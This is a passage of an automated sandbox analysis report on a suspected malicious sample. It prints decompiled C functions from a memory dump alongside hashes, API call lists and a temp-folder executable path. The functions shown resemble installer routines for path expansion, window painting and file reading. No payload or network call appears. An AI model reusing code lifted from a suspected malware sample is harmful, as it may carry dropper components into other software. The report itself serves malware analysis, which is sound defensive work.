          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
          • String ID: F
          • API String ID: 941294808-1304234792
          • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
          • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
          • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
          • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 72%
          			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
          				struct _ITEMIDLIST* _v8;
          				signed int _v12;
          				signed int _v16;
          				signed int _v20;
          				signed int _v24;
          				signed int _v28;
          				signed int _t44;
          				WCHAR* _t45;
          				signed char _t47;
          				signed int _t48;
          				short _t59;
          				short _t61;
          				short _t63;
          				void* _t71;
          				signed int _t77;
          				signed int _t78;
          				short _t81;
          				short _t82;
          				signed char _t84;
          				signed int _t85;
          				void* _t98;
          				void* _t104;
          				intOrPtr* _t105;
          				void* _t107;
          				WCHAR* _t108;
          				void* _t110;
          
          				_t107 = __esi;
          				_t104 = __edi;
          				_t71 = __ebx;
          				_t44 = _a8;
          				if(_t44 < 0) {
          					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
          				}
          				_push(_t71);
          				_push(_t107);
          				_push(_t104);
          				_t105 =  *0x7a8ad8 + _t44 * 2;
          				_t45 = 0x7a6a40;
          				_t108 = 0x7a6a40;
          				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
          					_t108 = _a4;
          					_a4 = _a4 & 0x00000000;
          				}
          				_t81 =  *_t105;
          				_a8 = _t81;
          				if(_t81 == 0) {
          					L43:
          					 *_t108 =  *_t108 & 0x00000000;
          					if(_a4 == 0) {
          						return _t45;
          					}
          					return E0040666E(_a4, _t45);
          				} else {
          					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
          						_t98 = 2;
          						_t105 = _t105 + _t98;
          						if(_t81 >= 4) {
          							if(__eflags != 0) {
          								 *_t108 = _t81;
          								_t108 = _t108 + _t98;
          								__eflags = _t108;
          							} else {
          								 *_t108 =  *_t105;
          								_t108 = _t108 + _t98;
          								_t105 = _t105 + _t98;
          							}
          							L42:
          							_t82 =  *_t105;
          							_a8 = _t82;
          							if(_t82 != 0) {
          								_t81 = _a8;
          								continue;
          							}
          							goto L43;
          						}
          						_t84 =  *((intOrPtr*)(_t105 + 1));
          						_t47 =  *_t105;
          						_t48 = _t47 & 0x000000ff;
          						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
          						_t85 = _t84 & 0x000000ff;
          						_v28 = _t48 | 0x00008000;
          						_t77 = 2;
          						_v16 = _t85;
          						_t105 = _t105 + _t77;
          						_v24 = _t48;
          						_v20 = _t85 | 0x00008000;
          						if(_a8 != _t77) {
          							__eflags = _a8 - 3;
          							if(_a8 != 3) {
          								__eflags = _a8 - 1;
          								if(__eflags == 0) {
          									__eflags = (_t48 | 0xffffffff) - _v12;
          									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
          								}
          								L38:
          								_t108 =  &(_t108[lstrlenW(_t108)]);
          								_t45 = 0x7a6a40;
          								goto L42;
          							}
          							_t78 = _v12;
          							__eflags = _t78 - 0x1d;
          							if(_t78 != 0x1d) {
          								__eflags = (_t78 << 0xb) + 0x7a9000;
          								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
          							} else {
          								E004065B5(_t108,  *0x7a8aa8);
          							}
          							__eflags = _t78 + 0xffffffeb - 7;
          							if(__eflags < 0) {
          								L29:
          								E004068F5(_t108);
          							}
          							goto L38;
          						}
          						if( *0x7a8b24 != 0) {
          							_t77 = 4;
          						}
          						_t121 = _t48;
          						if(_t48 >= 0) {
          							__eflags = _t48 - 0x25;
          							if(_t48 != 0x25) {
          								__eflags = _t48 - 0x24;
          								if(_t48 == 0x24) {
          									GetWindowsDirectoryW(_t108, 0x400);
          									_t77 = 0;
          								}
          								while(1) {
          									__eflags = _t77;
          									if(_t77 == 0) {
          										goto L26;
          									}
          									_t59 =  *0x7a8aa4;
          									_t77 = _t77 - 1;
          									__eflags = _t59;
          									if(_t59 == 0) {
          										L22:
          										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
          										__eflags = _t61;
          										if(_t61 != 0) {
          											L24:
          											 *_t108 =  *_t108 & 0x00000000;
          											__eflags =  *_t108;
          											continue;
          										}
          										__imp__SHGetPathFromIDListW(_v8, _t108);
          										_a8 = _t61;
          										__imp__CoTaskMemFree(_v8);
          										__eflags = _a8;
          										if(_a8 != 0) {
          											goto L26;
          										}
          										goto L24;
          									}
          									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
          									__eflags = _t63;
          									if(_t63 == 0) {
          										goto L26;
          									}
          									goto L22;
          								}
          								goto L26;
          							}
          							GetSystemDirectoryW(_t108, 0x400);
          							goto L26;
          						} else {
          							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
          							if( *_t108 != 0) {
          								L27:
          								if(_v16 == 0x1a) {
          									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
          								}
          								goto L29;
          							}
          							E004066AB(_t77, _t105, _t108, _t108, _v16);
          							L26:
          							if( *_t108 == 0) {
          								goto L29;
          							}
          							goto L27;
          						}
          					}
          					goto L43;
          				}
          			}





























          0x004066ab
          0x004066ab
          0x004066ab
          0x004066b1
          0x004066b6
          0x004066c7
          0x004066c7
          0x004066cf
          0x004066d0
          0x004066d1
          0x004066d2
          0x004066d5
          0x004066dd
          0x004066df
          0x004066f0
          0x004066f3
          0x004066f3
          0x004066f7
          0x004066fd
          0x00406700
          0x004068db
          0x004068db
          0x004068e6
          0x004068f2
          0x004068f2
          0x00000000
          0x00406706
          0x0040670b
          0x00406720
          0x00406721
          0x00406727
          0x004068b9
          0x004068c7
          0x004068ca
          0x004068ca
          0x004068bb
          0x004068be
          0x004068c1
          0x004068c3
          0x004068c3
          0x004068cc
          0x004068cc
          0x004068d2
          0x004068d5
          0x00406708
          0x00000000
          0x00406708
          0x00000000
          0x004068d5
          0x0040672d
          0x00406730
          0x0040673f
          0x00406746
          0x00406752
          0x00406755
          0x00406758
          0x00406759
          0x0040675e
          0x00406764
          0x00406767
          0x0040676a
          0x0040685d
          0x00406862
          0x00406895
          0x0040689a
          0x0040689f
          0x004068a4
          0x004068a4
          0x004068a9
          0x004068af
          0x004068b2
          0x00000000
          0x004068b2
          0x00406864
          0x00406867
          0x0040686a
          0x0040687f
          0x00406886
          0x0040686c
          0x00406873
          0x00406873
          0x0040688e
          0x00406891
          0x00406855
          0x00406856
          0x00406856
          0x00000000
          0x00406891
          0x00406777
          0x0040677b
          0x0040677b
          0x0040677c
          0x0040677e
          0x004067bb
          0x004067be
          0x004067ce
          0x004067d1
          0x004067d9
          0x004067df
          0x004067df
          0x0040683a
          0x0040683a
          0x0040683c
          0x00000000
          0x00000000
          0x004067e3
          0x004067e8
          0x004067e9
          0x004067eb
          0x00406802
          0x00406810
          0x00406816
          0x00406818
          0x00406836
          0x00406836
          0x00406836
          0x00000000
          0x00406836
          0x0040681e
          0x00406827
          0x0040682a
          0x00406830
          0x00406834
          0x00000000
          0x00000000
          0x00000000
          0x00406834
          0x004067fc
          0x004067fe
          0x00406800
          0x00000000
          0x00000000
          0x00000000
          0x00406800
          0x00000000
          0x0040683a
          0x004067c6
          0x00000000
          0x00406780
          0x0040679e
          0x004067a7
          0x00406844
          0x00406848
          0x00406850
          0x00406850
          0x00000000
          0x00406848
          0x004067b1
          0x0040683e
          0x00406842
          0x00000000
          0x00000000
          0x00000000
          0x00406842
          0x0040677e
          0x00000000
          0x0040670b

          APIs
          • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000400), ref: 004067C6
          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
          • lstrcatW.KERNEL32 ref: 00406850
          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Directory$SystemWindowslstrcatlstrlen
          • String ID: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
          • API String ID: 4260037668-868987720
          • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
          • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
          • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
          • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
          				struct tagLOGBRUSH _v16;
          				long _t39;
          				long _t41;
          				void* _t44;
          				signed char _t50;
          				long* _t54;
          
          				if(_a4 + 0xfffffecd > 5) {
          					L18:
          					return 0;
          				}
          				_t54 = GetWindowLongW(_a12, 0xffffffeb);
          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
          					goto L18;
          				} else {
          					_t50 = _t54[5];
          					if((_t50 & 0xffffffe0) != 0) {
          						goto L18;
          					}
          					_t39 =  *_t54;
          					if((_t50 & 0x00000002) != 0) {
          						_t39 = GetSysColor(_t39);
          					}
          					if((_t54[5] & 0x00000001) != 0) {
          						SetTextColor(_a8, _t39);
          					}
          					SetBkMode(_a8, _t54[4]);
          					_t41 = _t54[1];
          					_v16.lbColor = _t41;
          					if((_t54[5] & 0x00000008) != 0) {
          						_t41 = GetSysColor(_t41);
          						_v16.lbColor = _t41;
          					}
          					if((_t54[5] & 0x00000004) != 0) {
          						SetBkColor(_a8, _t41);
          					}
          					if((_t54[5] & 0x00000010) != 0) {
          						_v16.lbStyle = _t54[2];
          						_t44 = _t54[3];
          						if(_t44 != 0) {
          							DeleteObject(_t44);
          						}
          						_t54[3] = CreateBrushIndirect( &_v16);
          					}
          					return _t54[3];
          				}
          			}









          0x00404643
          0x004046f9
          0x00000000
          0x004046f9
          0x00404654
          0x00404658
          0x00000000
          0x00404672
          0x00404672
          0x0040467b
          0x00000000
          0x00000000
          0x0040467d
          0x00404689
          0x0040468c
          0x0040468c
          0x00404692
          0x00404698
          0x00404698
          0x004046a4
          0x004046aa
          0x004046b1
          0x004046b4
          0x004046b7
          0x004046b9
          0x004046b9
          0x004046c1
          0x004046c7
          0x004046c7
          0x004046d1
          0x004046d6
          0x004046d9
          0x004046de
          0x004046e1
          0x004046e1
          0x004046f1
          0x004046f1
          0x00000000
          0x004046f4

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
          • String ID:
          • API String ID: 2320649405-0
          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
          • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
          • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 87%
          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
          				intOrPtr _t65;
          				intOrPtr _t66;
          				intOrPtr _t72;
          				void* _t76;
          				void* _t79;
          
          				_t72 = __edx;
          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
          				_t65 = 2;
          				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
          				_t66 = E00402D84(_t65);
          				_t79 = _t66 - 1;
          				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
          				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
          				if(_t79 < 0) {
          					L36:
          					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
          				} else {
          					__ecx = 0x3ff;
          					if(__eax > 0x3ff) {
          						 *(__ebp - 0x44) = 0x3ff;
          					}
          					if( *__edi == __bx) {
          						L34:
          						__ecx =  *(__ebp - 0xc);
          						__eax =  *(__ebp - 8);
          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
          						if(_t79 == 0) {
          							 *(_t76 - 4) = 1;
          						}
          						goto L36;
          					} else {
          						 *(__ebp - 0x38) = __ebx;
          						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
          						if( *(__ebp - 0x44) > __ebx) {
          							do {
          								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
          									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
          										__eax = __ebp - 0x50;
          										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
          											goto L34;
          										} else {
          											goto L21;
          										}
          									} else {
          										goto L34;
          									}
          								} else {
          									__eax = __ebp - 0x40;
          									_push(__ebx);
          									_push(__ebp - 0x40);
          									__eax = 2;
          									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
          									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
          									if(__eax == 0) {
          										goto L34;
          									} else {
          										__ecx =  *(__ebp - 0x40);
          										if(__ecx == __ebx) {
          											goto L34;
          										} else {
          											__ax =  *(__ebp + 0xa) & 0x000000ff;
          											 *(__ebp - 0x4c) = __ecx;
          											 *(__ebp - 0x50) = __eax;
          											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
          												L28:
          												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
          											} else {
          												__ebp - 0x50 = __ebp + 0xa;
          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
          													L21:
          													__eax =  *(__ebp - 0x50);
          												} else {
          													__edi =  *(__ebp - 0x4c);
          													__edi =  ~( *(__ebp - 0x4c));
          													while(1) {
          														_t22 = __ebp - 0x40;
          														 *_t22 =  *(__ebp - 0x40) - 1;
          														__eax = 0xfffd;
          														 *(__ebp - 0x50) = 0xfffd;
          														if( *_t22 == 0) {
          															goto L22;
          														}
          														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
          														__edi = __edi + 1;
          														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
          														__eax = __ebp + 0xa;
          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
          															continue;
          														} else {
          															goto L21;
          														}
          														goto L22;
          													}
          												}
          												L22:
          												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
          													goto L28;
          												} else {
          													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
          														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
          															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
          															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
          														} else {
          															__ecx =  *(__ebp - 0xc);
          															__edx =  *(__ebp - 8);
          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
          														}
          														goto L34;
          													} else {
          														__ecx =  *(__ebp - 0xc);
          														__edx =  *(__ebp - 8);
          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
          														 *(__ebp - 0x38) = __eax;
          														if(__ax == __bx) {
          															goto L34;
          														} else {
          															goto L26;
          														}
          													}
          												}
          											}
          										}
          									}
          								}
          								goto L37;
          								L26:
          								__eax =  *(__ebp - 8);
          							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
          						}
          						goto L34;
          					}
          				}
          				L37:
          				return 0;
          			}








          0x004026ec
          0x004026ee
          0x004026f1
          0x004026f3
          0x004026f6
          0x004026fb
          0x004026ff
          0x00402702
          0x00402705
          0x00402c2a
          0x00402c2d
          0x0040270b
          0x0040270b
          0x00402712
          0x00402714
          0x00402714
          0x0040271a
          0x0040287e
          0x0040287e
          0x00402881
          0x00402886
          0x004015b6
          0x0040292e
          0x0040292e
          0x00000000
          0x00402720
          0x00402721
          0x0040272c
          0x0040272f
          0x0040273b
          0x0040273f
          0x004027d7
          0x004027ef
          0x004027ff
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00402745
          0x00402745
          0x00402748
          0x00402749
          0x0040274c
          0x00402751
          0x00402758
          0x00402760
          0x00000000
          0x00402766
          0x00402766
          0x0040276b
          0x00000000
          0x00402771
          0x00402771
          0x00402779
          0x0040277c
          0x0040277f
          0x0040283a
          0x00402841
          0x00402785
          0x0040278b
          0x00402797
          0x00402801
          0x00402801
          0x00402799
          0x00402799
          0x0040279c
          0x0040279e
          0x0040279e
          0x0040279e
          0x004027a1
          0x004027a6
          0x004027a9
          0x00000000
          0x00000000
          0x004027ab
          0x004027ae
          0x004027bc
          0x004027c2
          0x004027d0
          0x00000000
          0x004027d2
          0x00000000
          0x004027d2
          0x00000000
          0x004027d0
          0x0040279e
          0x00402804
          0x00402807
          0x00000000
          0x00402809
          0x0040280e
          0x0040284f
          0x00402871
          0x00402878
          0x0040285d
          0x0040285d
          0x00402860
          0x00402863
          0x00402866
          0x00402866
          0x00000000
          0x00402817
          0x00402817
          0x0040281a
          0x0040281d
          0x00402823
          0x00402827
          0x0040282a
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0040282a
          0x0040280e
          0x00402807
          0x0040277f
          0x0040276b
          0x00402760
          0x00000000
          0x0040282c
          0x0040282c
          0x0040282f
          0x00402838
          0x00000000
          0x0040272f
          0x0040271a
          0x00402c33
          0x00402c39

          APIs
          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
            • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: File$Pointer$ByteCharMultiWide$Read
          • String ID: 9
          • API String ID: 163830602-2366072709
          • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
          • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
          • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
          • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E004056D0(signed int _a4, WCHAR* _a8) {
          				struct HWND__* _v8;
          				signed int _v12;
          				WCHAR* _v32;
          				long _v44;
          				int _v48;
          				void* _v52;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				WCHAR* _t27;
          				signed int _t28;
          				long _t29;
          				signed int _t37;
          				signed int _t38;
          
          				_t27 =  *0x7a7a84;
          				_v8 = _t27;
          				if(_t27 != 0) {
          					_t37 =  *0x7a8b54;
          					_v12 = _t37;
          					_t38 = _t37 & 0x00000001;
          					if(_t38 == 0) {
          						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
          					}
          					_t27 = lstrlenW(0x7a0f68);
          					_a4 = _t27;
          					if(_a8 == 0) {
          						L6:
          						if((_v12 & 0x00000004) == 0) {
          							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
          						}
          						if((_v12 & 0x00000002) == 0) {
          							_v32 = 0x7a0f68;
          							_v52 = 1;
          							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
          							_v44 = 0;
          							_v48 = _t29 - _t38;
          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
          						}
          						if(_t38 != 0) {
          							_t28 = _a4;
          							0x7a0f68[_t28] = 0;
          							return _t28;
          						}
          					} else {
          						_t27 = lstrlenW(_a8) + _a4;
          						if(_t27 < 0x1000) {
          							_t27 = lstrcatW(0x7a0f68, _a8);
          							goto L6;
          						}
          					}
          				}
          				return _t27;
          			}

















          0x004056d6
          0x004056e0
          0x004056e5
          0x004056eb
          0x004056f6
          0x004056f9
          0x004056fc
          0x00405702
          0x00405702
          0x00405708
          0x00405710
          0x00405713
          0x00405730
          0x00405734
          0x0040573d
          0x0040573d
          0x00405747
          0x00405750
          0x0040575c
          0x00405763
          0x00405767
          0x0040576a
          0x0040577d
          0x0040578b
          0x0040578b
          0x0040578f
          0x00405791
          0x00405794
          0x00000000
          0x00405794
          0x00405715
          0x0040571d
          0x00405725
          0x0040572b
          0x00000000
          0x0040572b
          0x00405725
          0x00405713
          0x004057a0

          APIs
          • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
          • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
          • lstrcatW.KERNEL32 ref: 0040572B
          • SetWindowTextW.USER32 ref: 0040573D
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
            • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
            • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
